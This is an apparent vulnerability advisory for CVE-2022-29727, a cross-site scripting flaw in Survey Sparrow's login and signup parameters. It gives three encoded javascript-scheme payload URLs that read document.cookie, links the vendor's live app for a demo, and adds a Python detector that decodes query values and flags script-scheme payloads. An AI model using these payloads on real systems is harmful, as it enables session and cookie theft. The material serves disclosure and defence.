CVE-2022-29727: Enterprise-Survey-Software/Enterprise-Survey-Software 2022 at main · haxpunk1337/Enterprise-Survey-Software

Survey Sparrow Enterprise Survey Software 2022 has a Stored cross-site scripting (XSS) vulnerability in the Signup parameter.

Product: Enterprise-Survey-Software 2022

For Reflected XSS

https://LOCALHOST/login?test=Javascript%26colon;%252F%252F%E2%80%A9confirm?.(document.cookie)//

For Stored XSS

Visit https://LOCALHOST/login?test=Javascript%26colon;%252F%252F%E2%80%A9confirm?.(document.cookie)//

Now click on the signup button, or visit:

https://LOCALHOST/signup?test=Javascript%26colon;%252F%252F%E2%80%A9confirm?.(document.cookie)//

For demo

https://app.surveysparrow.com/
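
A defender-side check for request URLs like the ones above, added here as an example (not code from the advisory or the vendor): it canonicalizes each query value by repeated percent- and HTML-entity decoding and flags values that resolve to a script scheme. The function names, the round limit and the benign sample URL are assumptions.

```python
import html
import re
from urllib.parse import urlsplit, unquote

MAX_ROUNDS = 5  # assumed bound on decode passes
SCRIPT_SCHEME = re.compile(r"^(?:javascript|vbscript|data):", re.IGNORECASE)
LEADING_JUNK = "".join(map(chr, range(0x21)))  # C0 controls and space

# First URL is the request from the advisory; the second is a constructed benign one.
SAMPLE_URLS = [
    "https://LOCALHOST/login?test=Javascript%26colon;%252F%252F%E2%80%A9confirm?.(document.cookie)//",
    "https://LOCALHOST/login?next=%2Fdashboard",
]


def canonicalize(value):
    """Percent-decode and HTML-entity-decode until the value stops changing."""
    for rounds in range(MAX_ROUNDS):
        decoded = html.unescape(unquote(value))
        if decoded == value:
            return value, rounds
        value = decoded
    return value, MAX_ROUNDS


def inspect_url(url):
    """Return (param, canonical_value, reasons) for each suspicious query parameter."""
    findings = []
    for pair in filter(None, urlsplit(url).query.split("&")):
        name, _, raw = pair.partition("=")
        value, rounds = canonicalize(raw)
        # Browsers drop tab/CR/LF and leading controls or spaces before reading the scheme.
        probe = re.sub(r"[\t\r\n]", "", value).lstrip(LEADING_JUNK)
        if not SCRIPT_SCHEME.match(probe):
            continue
        reasons = ["script-scheme"]
        if rounds >= 2:
            reasons.append("multi-layer-encoding")  # e.g. %252F -> %2F -> /
        if "\u2028" in value or "\u2029" in value:
            # U+2028/U+2029 end a JavaScript "//" comment, so later text runs as code.
            reasons.append("js-line-terminator")
        findings.append((name, value, reasons))
    return findings


if __name__ == "__main__":
    for url in SAMPLE_URLS:
        print(url, "->", inspect_url(url))
```

The same canonicalize-then-match step can be run over access-log request lines to find earlier attempts against the `test` parameter.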
